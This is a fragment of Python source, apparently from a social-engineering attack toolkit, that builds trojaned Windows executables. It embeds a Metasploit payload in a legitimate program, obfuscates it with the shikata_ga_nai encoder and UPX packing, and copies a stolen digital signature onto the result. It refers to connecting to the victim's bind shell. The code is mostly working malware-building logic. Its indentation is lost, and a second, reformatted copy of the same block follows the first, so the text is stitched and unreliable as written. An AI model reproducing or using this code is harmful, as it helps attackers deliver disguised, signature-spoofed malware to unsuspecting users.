if backdoor_execution != "on": backdoor_execution = ""
subprocess.Popen("cp %s %s/legit.exe 1> /dev/null 2> /dev/null" % (custom_exe,setdir), shell=True).wait()
encodepayload=subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s %s %s %s | ruby %s/msfencode -c 10 -e x86/shikata_ga_nai -x %s/legit.exe -o %s/msf.exe -t exe %s 1> /dev/null 2>/dev/null" % (path,choice1,choice2,portnum,courtesyshell,choice4,path,setdir,setdir,backdoor_execution), shell=True).wait()
print_status("Backdoor completed successfully. Payload is now hidden within a legit executable.")
# define to use UPX or not
if upx_encode == "ON":
if choice1 != "set/reverse_shell":
print_status("UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.")
upx("%s/msf.exe" % (setdir))
# define to use digital signature stealing or not
if digital_steal == "ON":
print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
disitool.CopyDigitalSignature("src/core/digitalsig/digital.signature", setdir + "/msf.exe", setdir + "/msf2.exe")
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe" % (setdir,setdir), shell=True).wait()
encode1=("x86/shikata_ga_nai")
if choice1 == 'windows/shell_bind_tcp' or choice1 == 'windows/x64/shell_bind_tcp' :
print_info("When the payload is downloaded, you will want to connect to the victim directly.")
# specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell": attack_vector = "set_payload"
# if we have the java attack, multiattack java, and the set interactive shell
if attack_vector == "java" or multiattack_java == "on":
if attack_vector != "set_payload":
# pull in the ports from config
port1=check_config("OSX_REVERSE_PORT=")
# define to use UPX or not
if upx_encode == "ON":
if choice1 != "set/reverse_shell":
print_status(
"UPX Encoding is set to ON, attempting to pack the executable with UPX encoding."
)
upx("src/html/msf.exe")
# define to use digital signature stealing or not
if digital_steal == "ON":
print_status(
"Digital Signature Stealing is ON, hijacking a legit digital certificate"
)
disitool.CopyDigitalSignature(
"src/core/digitalsig/digital.signature",
"src/html/msf.exe", "src/program_junk/msf2.exe")
subprocess.Popen(
"cp src/program_junk/msf2.exe src/html/msf.exe 1> /dev/null 2> /dev/null",
shell=True).wait()
subprocess.Popen(
"cp src/program_junk/msf2.exe src/program_junk/msf.exe",
shell=True).wait()
encode1 = ("x86/shikata_ga_nai")
if choice1 == 'windows/shell_bind_tcp' or choice1 == 'windows/x64/shell_bind_tcp':
print_info(
"When the payload is downloaded, you will want to connect to the victim directly."
)
# specify attack vector as SET interactive shell